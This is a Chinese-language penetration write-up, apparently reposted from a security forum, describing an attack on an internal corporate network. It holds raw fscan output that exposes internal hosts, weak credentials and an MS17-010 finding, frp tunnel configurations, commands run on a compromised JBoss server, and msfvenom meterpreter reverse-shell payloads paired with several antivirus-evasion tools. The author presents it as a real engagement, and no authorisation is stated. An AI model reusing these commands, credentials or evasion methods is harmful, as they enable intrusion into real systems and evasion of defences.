172.16.2.85:9080 open
172.16.2.80:9084 open
172.16.2.80:9087 open

[+] received output:
172.16.2.150:9443 open
172.16.2.84:10001 open
172.16.2.84:10002 open

[+] received output:
[*] alive ports len is: 120
start vulscan
[*] NetInfo:
[*]172.16.2.100
   [->]AMEPROWEBEGAD
   [->]172.16.2.100
[*] NetInfo:
[*]172.16.2.84
   [->]ame-ro-nas
   [->]172.16.2.84
[*] NetInfo:
[*]172.16.2.5
   [->]db_ame
   [->]172.16.2.5
[*] NetInfo:
[*]172.16.2.9
   [->]backu
   [->]172.16.2.9
[*] NetInfo:
[*]172.16.2.11
   [->]Srv-Ant-Kas1
   [->]172.16.2.11
[*] WebTitle: https://172.16.2.11       code:200 len:102    title:None
[*] 172.16.2.9  (Windows Server 2003 3790 Service Pack 2)
[*] WebTitle: http://172.16.2.117       code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[*] NetBios: 172.16.2.190    AMEPRODBSIG01.ame.local             Windows Server 2016 Standard 14393 
[*] NetBios: 172.16.2.11     Srv-Ant-Kas1.ame.local              Windows Server 2012 Standard 9200 
[*] NetBios: 172.16.2.9      backup.ame.local                    Windows Server 2003 3790 Service Pack 2 
[*] WebTitle: https://172.16.2.82       code:302 len:222    title:302 Found ÞÀ│Þ¢¼url: https://172.16.2.82/restgui/start.html
[*] WebTitle: http://172.16.2.120:3128  code:400 len:3157   title:ERROR: The requested URL could not be retrieved
[*] WebTitle: http://172.16.2.200       code:403 len:4897   title:Apache HTTP Server Test Page powered by CentOS
[*] WebTitle: http://172.16.2.84        code:401 len:0      title:None
[*] WebTitle: https://172.16.2.87       code:200 len:83     title:None
[+] Postgres:172.16.2.200:5432:postgres 123456
[*] WebTitle: http://172.16.2.80        code:301 len:0      title:None ÞÀ│Þ¢¼url: https://172.16.2.80:443/
[*] WebTitle: http://172.16.2.82        code:302 len:208    title:302 Found ÞÀ│Þ¢¼url: https://172.16.2.82:443/
[*] 172.16.2.100  (Windows 10 Pro 19044)
[*] WebTitle: http://172.16.2.11        code:302 len:0      title:None ÞÀ│Þ¢¼url: https://172.16.2.11/
[*] WebTitle: http://172.16.2.83        code:302 len:208    title:302 Found ÞÀ│Þ¢¼url: https://172.16.2.83:443/
[*] WebTitle: http://172.16.2.86        code:301 len:56     title:None ÞÀ│Þ¢¼url: https://172.16.2.86/
[*] WebTitle: http://172.16.2.81        code:302 len:208    title:302 Found ÞÀ│Þ¢¼url: https://172.16.2.81:443/
[*] WebTitle: http://172.16.2.100:8083  code:404 len:0      title:None
[*] NetBios: 172.16.2.195    AMEPRODBSIG01P.ame.local            Windows Server 2016 Standard 14393 
[*] WebTitle: http://172.16.2.11:3128   code:404 len:196    title:404 Not Found
[*] WebTitle: https://172.16.2.83       code:302 len:222    title:302 Found ÞÀ│Þ¢¼url: https://172.16.2.83/restgui/start.html
[*] WebTitle: https://172.16.2.86       code:200 len:258    title:None
[*] WebTitle: https://172.16.2.70       code:200 len:4149   title:Management
[*] WebTitle: http://172.16.2.150:9000  code:200 len:3509   title:Twonky Server
[*] WebTitle: https://172.16.2.85       code:200 len:258    title:None
[*] WebTitle: http://172.16.2.70        code:302 len:265    title:302 Found ÞÀ│Þ¢¼url: https://172.16.2.70/
[*] WebTitle: https://172.16.2.20:8443  code:302 len:83     title:None ÞÀ│Þ¢¼url: https://172.16.2.20:8443/Login/Index
[*] WebTitle: https://172.16.2.72       code:301 len:84     title:None ÞÀ│Þ¢¼url: https://172.16.2.72/appwall-webui
[*] WebTitle: https://172.16.2.80       code:200 len:3618   title:" + ID_VC_Welcome + "
[*] WebTitle: https://172.16.2.81       code:302 len:222    title:302 Found ÞÀ│Þ¢¼url: https://172.16.2.81/restgui/start.html
[*] WebTitle: http://172.16.2.120       code:200 len:553    title:None
[*] WebTitle: http://172.16.2.37        code:302 len:0      title:None ÞÀ│Þ¢¼url: http://172.16.2.37/app_Login
[*] WebTitle: https://172.16.2.80:8084  code:501 len:0      title:None
[*] NetBios: 172.16.2.170    AME\SYNOLOGYAME                
[*] WebTitle: https://172.16.2.86:9080  code:202 len:0      title:None
[*] WebTitle: https://172.16.2.120      code:200 len:553    title:None
[*] WebTitle: https://172.16.2.120:8081 code:403 len:266    title:403 Forbidden
[*] WebTitle: https://172.16.2.80:9087  code:404 len:103    title:None
[*] WebTitle: http://172.16.2.80:9084   code:404 len:103    title:None
[*] WebTitle: http://172.16.2.45:8080   code:303 len:0      title:None ÞÀ│Þ¢¼url: http://172.16.2.45:8080/home.htm
[*] WebTitle: https://172.16.2.60       code:200 len:6391   title:None
[*] WebTitle: http://172.16.2.60        code:200 len:6391   title:None
[*] WebTitle: http://172.16.2.120:8080  code:403 len:266    title:403 Forbidden
[+] 172.16.2.5  MS17-010    (Windows Server 2003 3790 Service Pack 2)
[*] WebTitle: http://172.16.2.170       code:200 len:543    title:None
[*] 172.16.2.84  (Windows Storage Server 2016 Standard 14393)
[*] WebTitle: http://172.16.2.85        code:301 len:56     title:None ÞÀ│Þ¢¼url: https://172.16.2.85/
[*] 172.16.2.120  (Unix)
[*] 172.16.2.150  (Windows 6.1)
[*] 172.16.2.60  (Windows 6.1)
[*] NetBios: 172.16.2.120    NVR\NVRAME                          Unix 
[*] NetBios: 172.16.2.84     ame-pro-nas.ame.local               Windows Storage Server 2016 Standard 14393 
[*] NetBios: 172.16.2.60     AME\nas-60                          Windows 6.1 
[*] WebTitle: https://172.16.2.170      code:200 len:543    title:None

[+] received output:
[*] WebTitle: https://172.16.2.85/      code:200 len:258    title:None
[*] WebTitle: https://172.16.2.86/      code:200 len:258    title:None
[*] WebTitle: https://172.16.2.11/      code:200 len:102    title:None
[*] WebTitle: https://172.16.2.80:443/  code:200 len:3618   title:" + ID_VC_Welcome + "
[*] WebTitle: https://172.16.2.70/      code:200 len:4149   title:Management
[*] WebTitle: https://172.16.2.20:8443/Login/Index code:200 len:2839   title:Zentyal
[*] WebTitle: https://172.16.2.85:9080  code:202 len:0      title:None
[*] WebTitle: http://172.16.2.70:7070   code:404 len:201    title:None
[*] WebTitle: https://172.16.2.81/restgui/start.html code:200 len:2458   title:None
[+] InfoScan:https://172.16.2.80       [VMware vSphere] 
[*] WebTitle: https://172.16.2.83/restgui/start.html code:200 len:2458   title:None
[*] WebTitle: https://172.16.2.82/restgui/start.html code:200 len:2458   title:None
[*] WebTitle: http://172.16.2.72:8200   code:301 len:0      title:None ÞÀ│Þ¢¼url: http://172.16.2.72:8200/Console/
[*] WebTitle: http://172.16.2.72:8200/Console/ code:404 len:0      title:None
[*] WebTitle: https://172.16.2.82/restgui/start.html code:200 len:2458   title:None
[*] NetBios: 172.16.2.150    wdmycloud                           Windows 6.1 
[+] InfoScan:https://172.16.2.80:443/  [VMware vSphere] 
[*] WebTitle: https://172.16.2.72/appwall-webui/ code:200 len:4366   title:Radware Security Console
[*] WebTitle: http://172.16.2.45:8080/logon.htm code:200 len:2872   title:APC | Log On
[*] WebTitle: https://172.16.2.81/restgui/start.html code:200 len:2458   title:None
[*] WebTitle: http://172.16.2.37/app_Login/ code:200 len:860    title:None

[+] received output:
ÕÀ▓Õ«îµêÉ 65/121 [-] ftp://172.16.2.45:21 wwwroot 123456!a 421 Service not available, closing control connection.

[+] received output:
ÕÀ▓Õ«îµêÉ 109/121 [-] ssh 172.16.2.87:22 root a123456 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain

[+] received output:
[+] SSH:172.16.2.87:22:admin admin

[+] received output:
ÕÀ▓Õ«îµêÉ 110/121 [-] ssh 172.16.2.70:22 admin test ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain

[+] received output:
ÕÀ▓Õ«îµêÉ 110/121 [-] ssh 172.16.2.150:22 admin a123456. ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain

[+] received output:
ÕÀ▓Õ«îµêÉ 113/121 [-] ssh 172.16.2.38:22 admin abc123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain

[+] received output:
ÕÀ▓Õ«îµêÉ 114/121 [-] ssh 172.16.2.117:22 admin 2wsx@WSX ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain

[+] received output:
ÕÀ▓Õ«îµêÉ 120/121 [-] ftp://172.16.2.150:21 wwwroot 1 Permission denied.

[+] received output:
ÕÀ▓Õ«îµêÉ 120/121 [-] ftp://172.16.2.150:21 data 123456 Permission denied.

[+] received output:
ÕÀ▓Õ«îµêÉ 120/121 [-] ftp://172.16.2.150:21 data sysadmin Permission denied.

[+] received output:
ÕÀ▓Õ«îµêÉ 121/121
[*] µë½µÅÅþ╗ôµØƒ,ÞÇùµùÂ: 10m41.0832671s
2、fscan扫描出来的漏洞,一处postgres弱口令,一处ms17-010,一处ssh弱口令
Postgres:172.16.2.200:5432:postgres 123456
172.16.2.5  MS17-010    (Windows Server 2003 3790 Service Pack 2)
SSH:172.16.2.87:22:admin admin
frp代理
1、由于无法提权成功,所以我们决定换一种思路,先拿下内网中其他主机,提权到管理员权限,最后再对域控渗透。
2、服务器frps.ini设置
[common] 
bind_addr = 0.0.0.0 
bind_port = 7080 
token = admin123 
dashboard_user = admin 
dashboard_pwd = admin123
3、启动服务端
./frps -c ./frps.ini
wgtur5ckbyn14812.jpg
4、frpc.ini配置如下
[common] 
server_addr = xx.xx.xx.xx
server_port = 7080 
token = admin123 
tls_enable=true 
pool_count=5 

[plugin_socks] 
type = tcp 
remote_port = 4566
plugin = socks5 
plugin_user = admin 
plugin_passwd = admin123 
use_encryption = true 
use_compression = true
5、将frpc.exe和frpc.ini上传到受害机
6、CS中运行命令
shell "C:/usr/desarrollo/jboss-5.1.0.GA/server/sigAmeServer/deploy/ROOT.war/frpc.exe -c C:/usr/desarrollo/jboss-5.1.0.GA/server/sigAmeServer/deploy/ROOT.war/frpc.ini"
4qb3w4dcsgw14814.jpg
7、在服务器上可以看到,已经有连接返回了
440pkzvtd4j14819.jpg
8、在攻击机火狐浏览器foxyproxy插件中配置代理服务器
fipdxgt3wpy14824.jpg
9、在火狐浏览器中访问https://172.16.2.72/appwall-webui/成功,说明frp内网穿透成功
io2zwgx41iv14827.png
10、为了方便测试,使用proxifier作为全局代理

fxqmbauu01w14829.jpg
msf上线
1、因为扫出来一个ms17010,所以我们需要针对此漏洞进行利用,我选用目前公开的一些工具,虽然都没有免杀,但还是记录一下
kali linux
1、kali Linux中设置proxychains后无法使用,也没有找到原因,因为proxychains只支持http代理,我搭建的环境可以,但真实环境就不得行,搞不懂,有知道的大佬请指点一二,在下感激不尽!
潮汐在线免杀
1、Metasploit 生成 C
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=xx.xx.xx.xx LPORT=3333 -f c > shell.c
ia4yeyahadx14835.jpg
3、将生成的shellcode添加到潮汐shellcode免杀中,生成exe文件
1dgouofejup14837.jpg
4、上传执行后被杀软杀掉
eabvlncwn5h14840.jpg
Ant-AntV免杀
1、msf生成bin文件
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=xx.xx.xx.xx LPORT=5555 -f raw -o 1.bin
lwkddbk4knm14845.png
2、将1.bin放到当前bean_raw路径下。执行python3 gen_trojan.py即可在当前dist目录下生成exe文件。
3、将exe文件上传到目标机器,执行shell C:/usr/desarrollo/jboss-5.1.0.GA/server/sigAmeServer/deploy/ROOT.war/mail_update_a50ca.exe无法成功反弹shell,应该是被杀软杀了,因为我本地测试可以正常反弹
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.123.33
set LPORT 5555
exploit
sqebxnrgxg014851.jpgb2nxgwuanib14858.jpg
CuiRi免杀
1、msf生成shellcode
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=xx.xx.xx.xx LPORT=3333 -f c > shell.c
2、生成免杀马
.\cuiri_win64.exe -f msf.txt
pgkda1z5gg114865.jpg
3、将生成的木马上传到目标主机,执行shell C:\usr\desarrollo\jboss-5.1.0.GA\server\sigAmeServer\deploy\ROOT.war\main.exe无法反弹shell,本地测试也是无法反弹shell
hf5s1te13yv14869.jpg
AniYa免杀
1、生成免杀马
2rnfgjjhtht14873.jpg
2、将exe文件上传执行,无法绕过杀软,在本地测试可以成功上线
vnd4c0p4nlu14876.jpg
Postgresql getshell
1、由于msf无法绕过杀软,我们决定从Postgresql入手,寻找突破点
2、开启proxifier代理工具
3、使用navicat连接postgresql
a3eeyoqjocn14883.jpg
4、但是该机器是centos系统,我们要找的是Windows系统,所以先放弃这条路。
ys3ejaksfyj14889.jpg
VMware vSphere
1、有网站使用的是VMware vSphere
jl4gafprvj114895.jpg
2、Google搜索一下VMware vSphere漏洞,有的版本存在RCE漏洞,决定尝试一下,发现不存在漏洞
ggk4dgx0mhi14901.jpg
总结
1、针对此次内网渗透,我需要抓紧学习免杀相关的知识,目前公开的工具已经不能byAV。
2、kali Linux的proxychains代理在实战无法使用,后面我要去寻找原因。
3、fscan扫描出内网一些网站,我没有做深入的测试,因为时间确实不够了。
原文链接: https://xz.aliyun.com/t/12141